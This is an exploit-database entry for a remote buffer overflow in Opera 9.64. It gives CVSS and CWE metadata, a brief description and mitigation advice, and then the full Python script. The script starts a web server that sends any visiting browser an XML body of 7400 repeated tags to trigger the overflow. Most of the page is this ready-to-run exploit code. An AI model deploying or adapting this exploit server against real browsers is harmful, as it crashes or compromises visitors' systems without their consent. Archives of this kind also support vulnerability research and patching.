Opera 9.64 Remote Buffer Overflow Exploit

vendor:

Opera

by:

Ahmed Obied

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Opera

Affected Version From: 9.64

Affected Version To: 9.64

Patch Exists: YES

Related CWE: N/A

CPE: a:opera_software:opera

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2021

Opera 9.64 Remote Buffer Overflow Exploit

This exploit is similar to the bug found by Wojciech Pawlikowski for Firefox. It was tested using the latest version of Opera (9.64). The exploit is a GET request to the server which sends a header with a content type of text/xml and a payload of 7400 'A' characters. This causes a buffer overflow and can be used to execute arbitrary code.

Mitigation:

Update to the latest version of Opera.

Source

Exploit-DB raw data:

#
#   Author : Ahmed Obied (ahmed.obied@gmail.com)
#
#   - Similar to the bug found by Wojciech Pawlikowski for Firefox 
#     -> http://www.milw0rm.com/exploits/8306
#
#   - Tested using the latest version of Opera (9.64)
#
#   Usage  : python opera.py [port]
#    

import sys, socket
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
        
    def get_exploit(self):
        exploit = '<A>' * 7400
        exploit = '<xml>' + exploit + '</xml>'
        return exploit
            
    def log_request(self, *args, **kwargs):
        pass

    def do_GET(self):
        if self.path == '/':
            print
            print '[-] Incoming connection from %s' % self.client_address[0]
            print '[-] Sending header to %s ...' % self.client_address[0]
            self.send_response(200)
            self.send_header('Content-type', 'text/xml')
            self.end_headers()
            print '[-] Header sent to %s' % self.client_address[0]
            print '[-] Sending exploit to %s ...' % self.client_address[0]
            self.wfile.write(self.get_exploit())
            print '[-] Exploit sent to %s' % self.client_address[0]

def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [port]' % sys.argv[0]
        sys.exit(1)
    try:
        port = int(sys.argv[1])
        if port < 1 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[-] Web server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except KeyboardInterrupt:
                print '[-] Exiting ...' 
        except socket.error:
            print '[*] ERROR: a socket error has occurred ...'
        sys.exit(-1)    
    except ValueError:
        print '[*] ERROR: invalid port number ...'
        sys.exit(-1)
            
if __name__ == '__main__':
    main()

# milw0rm.com [2009-03-30]